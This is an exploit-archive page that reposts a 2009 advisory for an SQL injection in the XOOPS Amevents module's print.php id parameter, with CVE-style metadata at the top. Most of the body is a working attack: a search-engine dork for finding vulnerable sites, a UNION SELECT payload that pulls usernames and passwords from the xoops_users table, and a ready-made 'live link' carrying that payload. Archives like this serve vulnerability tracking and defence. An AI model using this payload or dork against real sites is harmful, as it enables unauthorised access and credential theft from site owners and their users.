Advertisement






XOOPS Module Amevents (print.php id) SQL Injection Vulnerability

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2009-01-09
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009010114

Below is a copy:

##########################################
#
# XOOPS Module:  Amevents
#
#
##########################################
#
##AUTHOR : netRoot
####HOME : http://www.passw0rd.info
#
####MAL : [email protected]
#
###########################################
#
# DORKS : dork: /modules/amevents/print.php?id=
###########################################
 
target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
 
Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
 
live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.